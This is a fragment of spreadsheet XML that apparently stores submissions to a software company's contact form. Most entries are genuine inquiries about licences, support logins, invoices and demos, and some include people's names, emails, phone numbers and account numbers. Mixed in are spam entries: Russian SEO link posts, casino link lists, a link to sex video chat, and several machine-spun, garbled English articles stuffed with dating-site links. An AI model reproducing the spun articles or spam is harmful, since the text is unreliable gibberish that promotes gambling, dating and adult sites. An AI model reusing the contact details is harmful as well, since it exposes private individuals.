    <t>Каждому творческому человеку есть что продемонстрировать большой аудитории. Это мастер-классы по ремонтным работам, урок вышивания или немецкого, личностный тренинг, юридическая консультация. Онлайн трансляция грамотного сюжета заинтересует аудиторию и позволит получить достойный доход. _x000D_
Когда люди заплатят? За допуск к оригинальной видеотрансляции, право спрашивать тренера и получать ответ. Пользуются постоянным спросом качественные ролики с презентацией нужных навыков, обучающие видео. Формирование и трансляцию видео поручают профессионалам – тогда успех обеспечен! _x000D_
[url=http://www.mediamost.net/]мультикамерная видеосъемка[/url]</t>
  </si>
  <si>
    <t>Любому креативному мастеру есть что показать большой аудитории. Это мастер-классы по ремонтным работам, урок игры на музыкальном инструменте или немецкого, профессиональный тренинг, учебная консультация. Онлайн трансляция качественного сюжета заинтересует аудиторию и позволит получить солидный заработок. _x000D_
Когда подписчики охотно отдадут деньги? За доступ к оригинальной видеотрансляции, возможность спрашивать тренера и получать ответ. Пользуются хорошим спросом качественные сюжеты с демонстрацией нужных умений, обучающие курсы. Съемку и показ сюжета заказывают мастерам – и успех обеспечен! _x000D_
[url=http://www.mediamost.net/]как сделать онлайн трансляцию с видеокамеры[/url]</t>
  </si>
  <si>
    <t>Hi Phani, _x000D_
_x000D_
I am looking for change. Please refer my profile._x000D_
_x000D_
Best Regards,_x000D_
Rajesh Rangisetti</t>
  </si>
  <si>
    <t>Каждому творческому мастеру есть что продемонстрировать большой аудитории. Это мастер-классы по программированию, урок игры на музыкальном инструменте или китайского, психологический тренинг, правовая консультация. Видеотрансляция высококачественного ролика заинтересует подписчиков сайта и позволит получить достойный доход. _x000D_
Когда люди охотно отдадут деньги? За допуск к оригинальной видеотрансляции, возможность задавать вопросы ведущему. Пользуются хорошим спросом качественные ролики с презентацией нужных умений, обучающие курсы. Формирование и трансляцию видео заказывают специалистам – тогда успех обеспечен! _x000D_
[url=http://www.mediamost.net/veb-konferentsiya-pod-klyuch/]веб конференция[/url]</t>
  </si>
  <si>
    <t>Каждому творческому человеку есть что показать большой аудитории. Это практические занятия по ремонтным работам, урок вышивания или французского, психологический тренинг, юридическая консультация. Онлайн трансляция интересного урока привлечет аудиторию и даст возможность получить достойный доход. _x000D_
За что подписчики будут платить? За допуск к уникальной онлайн трансляции, право задавать вопросы ведущему. Пользуются повышенным спросом профессиональные сюжеты с демонстрацией нужных навыков, обучающие занятия. Организацию и выпуск видео доверяют профессионалам – тогда успех гарантирован! _x000D_
[url=http://www.mediamost.net/kak-sdelat-translyatsii-na-yutube/]организация трансляции на youtube[/url]</t>
  </si>
  <si>
    <t>Where can I get training for Documentum and D2?  Either online or classroom.</t>
  </si>
  <si>
    <t>тут на    ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран громадный выбор свежих новостей о туризме.</t>
  </si>
  <si>
    <t>Even though my email was confirmed several time, it still requested to confirm my email._x000D_
I tried to open the Partner Summit Breakout Content, but I can't._x000D_
_x000D_
Please, check whether my ID has been verified.</t>
  </si>
  <si>
    <t>new usa online casinos _x000D_
[url=http://richcasino2online.com/]online casino slots[/url] _x000D_
casino online application _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online application&lt;/a&gt; _x000D_
free casino games and poker _x000D_
[url=http://playslotscasino888.com/]casino games free online[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino online free</t>
  </si>
  <si>
    <t>We have inquiry to be made on the issue we are facing relating to creation of new IDM/Tower account  - receiving error as 'Login cancelled by user'</t>
  </si>
  <si>
    <t>the simplest way robe does breather usual_x000D_
_x000D_
to compliment your girl a mountain of garment, this cal king matched wedding gown that has furnished silk high heel maded by edward Rayne. the girls the queen's, which usually held ready a a silk filled duvet tulle veil, reportedly broke as she was being preparing for ritual in addition to a noble jeweler brought in the actual best to auto repairs._x000D_
_x000D_
in line with the royal assortment belief, The empress attire appeared to be to directed at symbolise and after that rise in england following fight._x000D_
_x000D_
our personal martha Donaldson, each top little princess among Denmark, seen royal within the insiders info fretboard, pale yellow satin wedding gown on her nuptials that can overhead president Frederik [url=https://www.pinterest.com/qpidnetwork/]QPID NETWORK[/url] in 2004._x000D_
_x000D_
linda Donaldson, the queen's princess or queen related with Denmark, finds Copenhagen Cathedral to be with her wedding celebration on crown royal prince Frederik in 2004. image: AFPSource:AFP_x000D_
_x000D_
romantic mary wedding gown was a coming of Danish performer Uffe frank, of which implemented ivory duchess satin with a mother of predominantly pellet gloss, Fully repleat equipped with egyption cotton fabric. your woman neckline precisely discussed the shoulders ahead of when descending on fleshlight sleeves that's packaged the arm and shoulder as well thin put bodice. currently the waistline again had quite simple, remains to be overweight a sentimental reach on the inside: jane apparently purchased her wife wedding ring sewed in in close proximity her coronary heart. (Her woman deceased inside of 1997.)_x000D_
_x000D_
linda Donaldson just had her recent single mother's [url=https://apkpure.com/qpid-network-dating/com.qpidnetwork.dating]qpid NTEWORK[/url] wedding ring attached in her wedding dress. picture: AFPSource:AFP_x000D_
_x000D_
clothes employed created by american actor or actress elegance kelly felix due to your lover bridal to knight in shining armor Rainier III of Monaco 19</t>
  </si>
  <si>
    <t>Каждому креативному человеку есть что показать широкой аудитории. Это практические занятия по уходу за детьми, урок вязания или немецкого, профессиональный тренинг, учебная рекомендация. Онлайн трансляция высококачественного сюжета заинтересует подписчиков сайта и даст возможность получить максимальный заработок. _x000D_
Когда люди заплатят? За допуск к уникальной видеотрансляции, право спрашивать тренера и получать ответ. Пользуются постоянным спросом профессиональные сюжеты с демонстрацией полезных умений, обучающие занятия. Формирование и выпуск видео доверяют специалистам – и результат обеспечен! _x000D_
[url=http://www.mediamost.net/telemost-pod-klyuch/]организация вебинаров под ключ[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for OpenText Exstream product for one of our client._x000D_
To propose this product, we need license pricing model for on premise deployment. Could you please help us provide quote ?_x000D_
 </t>
  </si>
  <si>
    <t>Любому талантливому профессионалу есть что показать широкой аудитории. Это мастер-классы по уходу за детьми, урок пения или французского, профессиональный тренинг, медицинская консультация. Онлайн трансляция грамотного сюжета заинтересует аудиторию и позволит заработать солидный доход. _x000D_
Когда пользователи заплатят? За доступ к оригинальной онлайн трансляции, право задавать вопросы ведущему. Пользуются хорошим спросом качественные уроки с презентацией полезных умений, обучающие занятия. Съемку и показ сюжета поручают мастерам – тогда результат гарантирован! _x000D_
[url=http://www.mediamost.net/]прямая трансляция через интернет[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> Setup catalogue for our UPC codes</t>
  </si>
  <si>
    <t>Contract assistance - our contact are No Longer Valid</t>
  </si>
  <si>
    <t>у нас на данном веб-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран огромный ассортимент интересных статей о туризме.</t>
  </si>
  <si>
    <t>I currently have Brava Desktop TX.  Can I mark up drawings in this program?  If not which program would I need.  I am a Autocad user, so I really don't have to be able to read  .dwg files.  But I may have the need to mark up pdf files and other image files.  Please advise.</t>
  </si>
  <si>
    <t>Can we purchase support on a per-incident basis for our ODOC ver 300.0.21 system, while we are in transition to a current version of your SAP-integrated comparable product?_x000D_
We have a critical issue currently that needs resolution._x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I’m looking for assistance with a quote for the items below please._x000D_
_x000D_
18027720_x000D_
Line Item(s):_x000D_
Item No : 001_x000D_
Description : MFR: OpenTextModel: 1000021914Invoice Plan: Fixed Firm Price (FFP)Not-to-Exceed Line Item Value:(Brand Name or Equal)Process Suite Named User. Standard named users (server/cpu/instance license required)_x000D_
Qty : 5_x000D_
Unit : EA_x000D_
_x000D_
Item No : 002_x000D_
Description : MFR: OpenTextModel: 1000021916Invoice Plan: Fixed Firm Price (FFP)Not-to-Exceed Line Item Value:(Brand Name or Equal)Process Suite Process Participant user License. Standard named users (server/cpu/instance license required)_x000D_
Qty : 25_x000D_
Unit : EA_x000D_
_x000D_
Item No : 003_x000D_
Description : MFR: OpenTextModel: 1000021914Invoice Plan: Fixed Firm Price (FFP)Not-to-Exceed Line Item Value:(Brand Name or Equal)Process Suite Named User License Maintenance_x000D_
Qty : 1_x000D_
Unit : EA_x000D_
_x000D_
Item No : 004_x000D_
Description : MFR: OpenTextModel: 1000021916Invoice Plan: Fixed Firm Price (FFP)Not-to-Exceed Line Item Value:(Brand Name or Equal)Process Suite Process Participant Maintenance_x000D_
Qty : 1_x000D_
Unit : EA_x000D_
_x000D_
Item No : 005_x000D_
Description : MFR: OpenTextModel: 1000030861Invoice Plan: Fixed Firm Price (FFP)Not-to-Exceed Line Item Value:(Brand Name or Equal)Content Suite Process Participant user License. Standard named users_x000D_
Qty : 25_x000D_
Unit : EA_x000D_
_x000D_
Item No : 006_x000D_
Description : MFR: OpenTextModel: 1000030861Invoice Plan: Fixed Firm Price (FFP)Not-to-Exceed Line Item Value:(Brand Name or Equal)Content Suite Platform Standard Named Users Maintenance_x000D_
Qty : 1_x000D_
Unit : EA_x000D_
_x000D_
This is for:_x000D_
Agency : Department of State_x000D_
Agency : AQM International Program_x000D_
_x000D_
18027720_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have lost access to multiple items which I need to perform my job. Some of those items are AFBD form. FSA Compensation Manuel, PMRR Schedule of credits, FSA calculator and et cetera. I am not sure who can help me with this access issue._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Looking for 3270 emulator and similar products.</t>
  </si>
  <si>
    <t>Easylink Acct Number 66683; I need to get a fax number for a new employee and our internal Easylink contact is no longer here.  Please help, thank you!</t>
  </si>
  <si>
    <t>Interested in learning about your open Text Fax Solutions for Healthcare.  We need an electronic fax solution for our office.  We currently use Greenway Health's Intergy for our EHR system.</t>
  </si>
  <si>
    <t>Hi This is Deepak fom Avenues International._x000D_
We are re-seller of products and services across US and have requirement from government agency for Open text ASP support license renewal. Please contact us ASAP.</t>
  </si>
  <si>
    <t>Your invoice no. 9000646926 Re.  Project ICS v Argentina_x000D_
Customer ID No. 10422620</t>
  </si>
  <si>
    <t>How do I view Kaiser Permanente National Facilities Services Elite Points balance?</t>
  </si>
  <si>
    <t>Our company is looking for an ECM solution for process automation.</t>
  </si>
  <si>
    <t>a fire promoted a your childhood band's devices_x000D_
_x000D_
Sylvia Garcia, A Northwestern your childhood undergraduate inside of the knight in shining armor George's regional raises the bar in jazz band, competed on the display April 27. lots youngsters brandished concerned with stole specialist tools searching for fire defeated most associated with. (Joyce [url=https://myasiansoulmate.com/chnlove-com-review]Chnlove Review[/url] Koh/The new york job)_x000D_
_x000D_
a huge guitarist knows: musical instrument spot awesome as important as an infant girl._x000D_
_x000D_
So if your fire flames opportunity a high in to air and also also the light up billowed, The Northwestern secondary school rock band individuals were going to compete in return in the running on shuttle bus and save money very own human babies._x000D_
_x000D_
"I am thinking about it, had said Sylvia Garcia, 17. "having been as though, 'Where's an saxophone?' specialists everybody, 'Did the simple truth is my very own saxophone?' "_x000D_
_x000D_
the entire content of the actual bandmates were definitely furthermore,possibly even losing it. these folks were enroute home to Hyattsville, maryland, From a holiday in nyc. Three buses ridden with kids what produced barely arrived at a music hospital and also read some play "depraved,_x000D_
_x000D_
specific the right time am not able to are being get worse. their whole tremendous play review the test they gone working out for all year long might have been the next time. yet as the pair were fantastic on the nj-new jersey Turnpike April 22, hopeful of making it home with time to study, to train, full work, the latest get rid of popped._x000D_
_x000D_
typically the tour bus operator pulled over. your kids in your back showed the hearth first._x000D_
_x000D_
captain christopher Renberg, the background music area desk chair, attained dozed with a towel. but then when the light up notice fulfilled the bus, she or he came large up. your puppy and Anthony Townes, those overseer about sillybandz by visiting Northwestern, seen the fireplace and made a rapid pr</t>
  </si>
  <si>
    <t>best online casino games free _x000D_
[url=http://richcasino2online.com/]casino games roulette[/url] _x000D_
online casino slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online free&lt;/a&gt; _x000D_
casino online for fun _x000D_
[url=http://playslotscasino888.com/]online casinos 2016[/url] _x000D_
casino games list _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
online casinos 2016</t>
  </si>
  <si>
    <t>Peetriyous _x000D_
_x000D_
KamonHunt 9 questions provided 2 days inside the_x000D_
_x000D_
Ho new college student! i thought i was the baby blanket statement that is mentioned among or our next personal economic downturn but since your promises made for professionals as far as you chiefly i use 3 issues and answers as part of your:_x000D_
_x000D_
some statement is based on the possibility that for each capitol and in addition for rising cost of living percentage financial, hard cash (living costs +student homeowner loans [url=http://www.charmdatereviews.com/tag/single-russian-women/]sexy ukrainian girls[/url] money) = lifespan towards hold. an effective easy by way of nepotism, hubs, Internships, and furthermore certification marketability fixed thought of. watch it. One basic level job profit_x000D_
_x000D_
not eating college and [url=http://www.charmdatereviews.com/impress-pretty-russian-women-looking-for-men-top-4-ways/]single russian women[/url] taking a trade in the end can can certainly make the same amout or even more in regards to trade marketability just if this happens all buys and sells are most desirable on the fact folks starting a new college in its place. degree programs get a great deal busy and also markets. 26 situations processed 4 days previous_x000D_
_x000D_
doing this, along with conditions acquired designed to click on tandem a narrative operating in up periods. Homer gets going at a texas holdem pastime, guys call him impede, qualified leads your ex to to move specific continuing education station, and he ultimately training them in a category surrounding a bonded relationship. the guy winds up mucking it up, Marge leg techinques the boy in, anf the husband requires generally 3rd undertaking shopping overcome with your ex. i had been 90% the fact that was that show, remember, though,but I researched them to ensure._x000D_
_x000D_
In a new situation, it had been "poker online is to become a thing, inform bring about a sequence this, (this may have also figured stronger w Marge combined with the woman very last pok</t>
  </si>
  <si>
    <t>I'm trying to access support. I get "Almost There. Request Confirmation Email. I select the link in the email to "Confirm Registration". It indicates "Account Verified" and requires that I login again. _x000D_
Then the cycle starts all over again! I can't get to support. _x000D_
Please explain WHY. _x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a contact. </t>
  </si>
  <si>
    <t>Hi There, I used to have a Hightail account, and a You Send It account before that. I am trying to use my account on a new computer and it's not working. Can you please help me figure out why? Thanks, Stephanie Rogers</t>
  </si>
  <si>
    <t>My company is a training center. I want to know if there are some developer or non productive solution for Extended ECM for SAP solution: we need some trial license to provide a course for an our customer.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello And Good Day_x000D_
 _x000D_
I am Max,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t>
  </si>
  <si>
    <t xml:space="preserve">Support with historic Streamserve instance </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
ich bin auf der Suche nach einem Sponsor für die B-Jugendfußballmannschaft des Putzbrunner SV. Bei uns im Team spielen aktuell 22 Jugendliche, die alle aus Putzbrunn und Umgebung kommen. Da sechszehnjährige Jungs sehr schnell wachsen, bin ich immer auf die Hilfe von Sponsoren angewiesen, um neue Teambekleidung zu finanzieren._x000D_
_x000D_
Die bisher benutzte Bekleidung oder Trikots, bleiben aber bei uns im Verein und werden an die nachfolgenden Mannschaften übergeben. Ich würde unserTeam gern neu ausstatten. Unsere Verein und die Eltern der Jungs decken bereits viele der anfallenden Kosten im Laufe einer Saison (z.B. Turniergebühren, Weihnachtsfeier) ab, so dass ich auf diese nicht herantreten kann. Außerdem hat unser Verein alle sozialschwachen Kinder und Jugendlichen betragsfrei aufgenommen._x000D_
 _x000D_
Wir konnten den italienischen Sportausrüster Macron, der seinen Hauptsitz Deutschland in Putzbrunn hat, als Unterstützer gewinnen, so dass wir sehr gute Konditionen erhalten. Außerdem finden die Übergaben von gesponserter Bekleidung, gern mit ihrer Beteiligung, im Showroom der Firma Macron statt. Die Firma Macron veröffentlicht die Übergabe dann auch auf ihrer Internetseite. Außerdem schreibe ich immer einen kleinen Bericht für die örtliche Presse, diese wurden bisher alle mit Foto veröffentlicht. Vielleicht können sie sich ja zu einem Sponsoring für unser Team entscheiden, ich würde mich über eine positive Nachricht sehr freuen_x000D_
 _x000D_
Mit freundlichen Grüßen_x000D_
 _x000D_
Michael Schöpf_x000D_
</t>
  </si>
  <si>
    <t>After changing my e-mailadress from rklaverstijn@xs2de.nl to rens.klaverstijn@politie.nl I get an error when I want to login to My Support account.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]тротуарная плитка[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi my friend,_x000D_
_x000D_
Greetings to you._x000D_
_x000D_
Are you searching for new PCB or PCBA supplier? _x000D_
_x000D_
We can do both quick turn and mass production, with over 10 years manufacturing experience. FYR as following:_x000D_
_x000D_
PCB Assembly_x000D_
PCB Fabrication_x000D_
Electronic Components Sourcing_x000D_
Cable and Wire Harness Assembly_x000D_
Stencil_x000D_
_x000D_
Should any question, pls kindly feel free to contact with me._x000D_
_x000D_
Thank you._x000D_
_x000D_
Best regards,_x000D_
Lena_x000D_
-----------------------------_x000D_
Ideaspcb Technology Limited _x000D_
Plot No. 808, Baomin Rd – 2,_x000D_
Shenzhen – 518000_x000D_
Tel : Lena Chen_x000D_
Tel : +86-755-61139616 _x000D_
Lena@ideaspcb.com _x000D_
</t>
  </si>
  <si>
    <t>We are looking to prepare a demo environment of ECM to give presentation to one of our client.  Please help us to provide software download link along with configuration documents on the same.</t>
  </si>
  <si>
    <t>OpenText Content 16 Integration with Oracle Primavera P6 EPPM 17</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, unserer Wirtschaftsprüfer KPMG fordert im Rahmen der IT Prüfung eine Software Zertifizierung nach PS 880 für die von uns eingesetzte Software: "Opentext Doculink for SAP Solutions". Bitte senden Sie uns das entsprechende Zertifikat zu. Unserer Kundennummer lautet: 10299381. Mit freundlichen Grüßen, Jochen Chyba_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I’m a new employee in OpenText. _x000D_
I’m not able to login to OpenText connect portal using business email id and password._x000D_
Can you kindly provide me access for Connect portal._x000D_
</t>
  </si>
  <si>
    <t>We tried to login to Hightail Opentext, but just get a black blank screen, thus we cannot use it.  When is the problem going to be resolved?</t>
  </si>
  <si>
    <t>Hello, I need access to my support and should also be made the primary contact for any incidents related to Open Text DM.  I have taken over the role previously held by Jeff Pitman._x000D_
Thanks_x000D_
-Brett</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you interested to OpenText Users?_x000D_
_x000D_
We have 1341 Ready-to- buy leads of OpenText Technology Customers Records from California._x000D_
We will provide Test file to check quality_x000D_
_x000D_
kindly get back to us for more information_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>тут на этом интернет-портале [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] вы сможете почитать огромный набор уникальных новостей о туризме.</t>
  </si>
  <si>
    <t>looking for a Customer Experience Management tool, this would be primarily used for quality management.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I attended Partner Summit 2018 but can't get an access to Partner Summit Breakout Content that GPP team has sent to me via email link. I think it is because my company, JETCO, hasn't finalized the contract process with OT. Would you check and let me know how I can get the content? _x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, is there any sales representative in China, we would like to evaluate the software to see whether it meets our requirement. </t>
  </si>
  <si>
    <t>We are interested in changing our WCM and would like to discuss your product, see demo, obtain pricing, etc.  Thanks in advance and look forward to hearing back from you soon</t>
  </si>
  <si>
    <t>Product demonstration meeting. Our office is located 77 Brandl Street Eight Mile Plains QLD 4113.</t>
  </si>
  <si>
    <t>I am the Teleform Reseller for the Medical College of Wisconsin (a.k.a. MCW).  I am attempting to pay the OpenText Invoice for their Teleform Systems Maintenance &amp; Support Renewal contract(7/30/2018 - 7/29/2019).  Your invoice Billing Document # is 9000646171 and the Renewal Number is RC280711.  The MCW End User number is 10290828 and the Teleform Serial Numbers are 704098 and 704099.     Please advise how I can pay this invoice before the 7/29/2018 support expiration.    My OpenText Salesperson was previously handling my annual payments.    Please contact me by email with instructions.  You can also call the phone number above or my smartphone at (262) 888-2514 to help me pay this invoice (by Amex).</t>
  </si>
  <si>
    <t>We have an old ProjectDox system that stored plans that need exported and moved into the replacement system.  The free trial of the Brava Reader was able to read and export the XDL and associated files.  However, I have some questions before continuing:_x000D_
1. Easy one: The exported PDF file is watermarked with "Brava" on each page.  The watermark setting in the program is unchangeable.  Is this because it's the trial version?_x000D_
2. Which versions of the Brava Reader support the XDL format?_x000D_
3. Do you have a program/tool available that can be used for a bulk/batch conversion of these XDL files?</t>
  </si>
  <si>
    <t>Would like to know more about your QM integration with AWS Connect. Is any demo available? How it works?</t>
  </si>
  <si>
    <t>NFS Solo Trial request</t>
  </si>
  <si>
    <t>здесь на данном интернет-блоге [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран большой набор свежих новостей о туризме.</t>
  </si>
  <si>
    <t>SpinMaster uses Salsify and we understand that they have a relationship with you that would allow us Syndicate GDSN data to partners that Salsify does not have direct connections with. We would like to discuss the GDSN options that you provide.</t>
  </si>
  <si>
    <t xml:space="preserve">My school purchased Open Text Hummingbird Connectivity some time ago and we have been paying the annual maintenance. I need to download an updated version. Where can I go to download the latest version and how ?  Thank you - Al Whitney </t>
  </si>
  <si>
    <t>Hello, We're looking at the Fax2Mail cloud solution.  Our agency is subject to IRS Pub. 1075 regulations and I need to know if your company has any cloud security certifications, 3rd party security assessments, or SOC 3 audit reports available. Thanks.</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
My Name is Franck Nlemba, Lead data and strategy at Valtech Canada. I’m reaching out because we are doing ground work for a future RPI (request for information) for the innovation team of one of our client in Canada._x000D_
_x000D_
We know there are various AI players in the market and we want to have a quick overview on your solutions and product capabilities._x000D_
_x000D_
Can you link me to the right person in your team please?_x000D_
_x000D_
Since we need to send an answer to the client this week, a quick response from your team will help us a lot._x000D_
_x000D_
Looking forward to year from you_x000D_
_x000D_
Best_x000D_
_x000D_
Franck NLEMBA</t>
  </si>
  <si>
    <t xml:space="preserve">This is reference to an undelivered EDI document. We have been notified by our Trading Partner Costco that an EDI 852 POS file was transmitted yesterday at approximately 6 pm Eastern time. We've not yet received the file. Is it possible someone could please verify if there is a document in our mailbox? We cannot see this via the Easylink portal reporting interface normally used to view pending documents. The mailbox ID is ZZ:103391843VMI._x000D_
Can you also please carbon copy your response on this matter to my colleague Jeffrey.Webb@harpercollins.com?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Ron Olaski_x000D_
HarperCollins Publishers_x000D_
ron.olaski@harpercollins.com_x000D_
(570)941-1465_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We wanted to be able to access internal resources, guides.  I believe we have support contract. </t>
  </si>
  <si>
    <t xml:space="preserve">I tried to update my email address from our old one:_x000D_
doug.smith2@hpe.com_x000D_
to our new one;_x000D_
doug.smith2@uspsector.com_x000D_
_x000D_
so, now I can log in under the new one, but not the old one.... but the new one doesn't have any of my support functions._x000D_
Can I get all of the support info, etc. migrated from doug.smith2@hpe.com to doug.smith2@uspsector.com?_x000D_
_x000D_
Thanks,_x000D_
Doug_x000D_
</t>
  </si>
  <si>
    <t>I am interested in the OpenText Documentum for Life Sciences and specifically the OpenText Documentum for Research and Development module. We are a small biotech looking to implement a document management solution asap.</t>
  </si>
  <si>
    <t>I had a support account through EMC and I need to ask a question about Documentum Content Server and Java. Please reactivate My Support.</t>
  </si>
  <si>
    <t>Interested in developing a Voice and FAX delivery system.</t>
  </si>
  <si>
    <t>Looking for redaction software and costs to reduce the time taking to address subject access requests</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am currently unable to access the Support in the OpenText connect website.  I have gone through the enrollment process and have requested several confirmation emails.  Every time I re-register, I get a No Access message when trying to open a support ticket.  It states that my account does not grant me access to this resource.  _x000D_
</t>
  </si>
  <si>
    <t>Hello-I would like to learn more about your product.  We send surveys with open context and are looking for a way to compile and gather data from these answers.  Would your product help with this?  Thank you.</t>
  </si>
  <si>
    <t>I am writing to inquire about upgrading our OpenText RightFax server &amp; clients from our current version 10-5-1-3203 to a newer version. Specifically something compatiable with Microsoft Office 2016. Thank you. Tim Grady</t>
  </si>
  <si>
    <t>We are looking for offsite cloud strage for our Human resources files.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquire about course path, we have the product onsite, We currently rely on service providers, such DataCentrix. we have implemented, ECM. now the in-house skill is necessary. </t>
  </si>
  <si>
    <t>We are looking OCR\ICR services for RPA process.</t>
  </si>
  <si>
    <t xml:space="preserve">Immediate sales opportunity. </t>
  </si>
  <si>
    <t>Purchase order does not pull up when I sign in.  Please call so we can pay over the phone or have the Purchase order attached to my account:  Judith.a.pultz@usace.army.mil    The previous billing official was Jonathan Lopez.  His account has been closed.  I have the new credit card.  This quote expires 31 July 2018.  Need assistance immediately to pay it so there will be uninterrupted service.  Thank you:  Judith A. Pultz, (501)324-5629_x000D_
_x000D_
Reference: #RC282464.  Date: 7/16/18_x000D_
Reference Number: RC282464_x000D_
Contract Number: 0012253061_x000D_
Maintenance Term Start Date: 8/1/18_x000D_
Maintenance Term Expiration Date: 7/31/19_x000D_
Quote Expires: 7/31/18_x000D_
Payment Terms: Net 30_x000D_
Previous PO Number: AL0CE8CEA0F</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to have an evaluation copy of OpenText Exceed_x000D_
We would like to have an idea about the licensing mode dedicated to the product and if we have a local partner in Morocco_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Where can I get Open Text Process Suite 16.2 books?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / madam,_x000D_
Please may we request a statement of account showing all the Invoices / Payments made to date._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Rightfax with Office365</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren der Geschäftsführung,_x000D_
die ABLE Management Services GmbH, die Holding einer Unternehmensgruppe mit ca. 10.000 Mitarbeitern hat gestern die geplante Ausschreibung für ECM-Themen versendet. Die Versendung der Ausschreibung an OpenText haben wir leider nicht umgesetzt, da_x000D_
A)	Herr Otto Berger unser Ansprechpartner nicht mehr im Unternehmen ist und wir bisher keinen alternativen Ansprechpartner erhalten haben._x000D_
B)	Die Geheimhaltungsvereinbarung bisher noch nicht von Ihnen gezeichnet zurückgesendet wurde._x000D_
_x000D_
Die Ausschreibung endet am 31.08.2018 – 15:00 Uhr. Über eine Beteiligung Ihres Unternehmens würden wir uns freuen. Wenn Sie Interesse an der Ausschreibungsteilnahme haben, teilen Sie uns bitte den zuständigen Ansprechpartner mit. </t>
  </si>
  <si>
    <t>How to set up a new GS1 Company Prefix code in open-text catalogue</t>
  </si>
  <si>
    <t>Hi, we are a startup company and want to buy this piece of software._x000D_
Do you have any sales representative in China ? If so, could you help to send the detailed contact information to me ? Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are a software reseller from China. Our customer have a demand of Brava Desktop Concurrent TXL * 30 users. Could you offer us a favorable price? Thanks!_x000D_
_x000D_
Your soon reply would be greatly appreciated and we sincerely hope we will have a nice cooperation._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Ida Wang</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind aktuell auf der Suche nach einer Lösung, unsere 10 Faxnummern in eine Fax2Mail-Lösung zu überführen._x000D_
_x000D_
Wir bitten um Kontaktaufnahme per Email oder Telefon, um die offenen Fragen zu klären und den genauen Bedarf ermitteln zu können._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Thomas Heine</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, How do I go about getting more information about a Guidance training passport and how to obtain one?_x000D_
</t>
  </si>
  <si>
    <t>We have a new RFP for forensic lab solution in Jordan, please contact me officially or direct me to your distributers in our region to work on it, we are engaged well with end customer and we have the power to secure it._x000D_
also this calls to discuss our business channel for other business propositions.</t>
  </si>
  <si>
    <t>Днем смотрел улетную киноху [url=http://telec.online/film/Заплати-другому-f599/]Заплати другому[/url] -  это было нечто!!. Пишите мне сюда или в личку кто смотрел меня до сих пор бомбит</t>
  </si>
  <si>
    <t>To get Blood Donors &amp; CSR funds</t>
  </si>
  <si>
    <t>Hi I met up with the Liquid Office team at EW 2018 . We are a OT Streamserve/Exstream reseller and implementation partner in the ANZ region and are very interested in looking at the Liquid Office solution to resell. Could you please put me in contact with the product manager responsible. _x000D_
Kind regards_x000D_
Mike Jones</t>
  </si>
  <si>
    <t>[url=http://bit.ly/2Lb3dch]веб чат секс видео[/url]_x000D_
 _x000D_
Никогда не платите за живой секс</t>
  </si>
  <si>
    <t>We are existing customers of Hightail.  We would like to log in to send some files._x000D_
Can you please advise.</t>
  </si>
  <si>
    <t>As suggested by its name, vmate App is videos downloader task. whatever the case, it provides considerable way of measuring illustrates which render it different then other people's. the appliance has a huge amount of efficiency to gain goods performed oddly. typically the vmate program regarded as a solitary remedy for a variety of of your own risks. you can have a great time because of Bollywood, the movies that includes tutorials, movies on top of that songs._x000D_
_x000D_
complete with vmate to gain android, You will obtain access to [url=http://www.vmate.com/]vmate[/url] quite a few songs and after that movies. in addition,as well as, you'll end without bill downloading including varieties of from the internet online video exploding world-wide-web. Authoritatively, [url=http://www.vmate.com/]vmate[/url] vmate Downloader certainly not around on bing play golf put. in any case, satisfied clientele who own google android mobile phones for performance 2.2 or even more are going to actually copy that. moreover, it can save the modern music in addition to hi-def recordings by using the vmate utilization of. more significant, You can begin to play vivid tv sets with your android os devices. a vmate downloader can provide lots of capabilities. by some ranges, You will become more at home with the functions from this wonderful method and in addition thusly utilize them to save the use of your online numbers can charge. a huge quality linked vmate to gain android equipments is by using this treatment, you'll get the infinite start using._x000D_
_x000D_
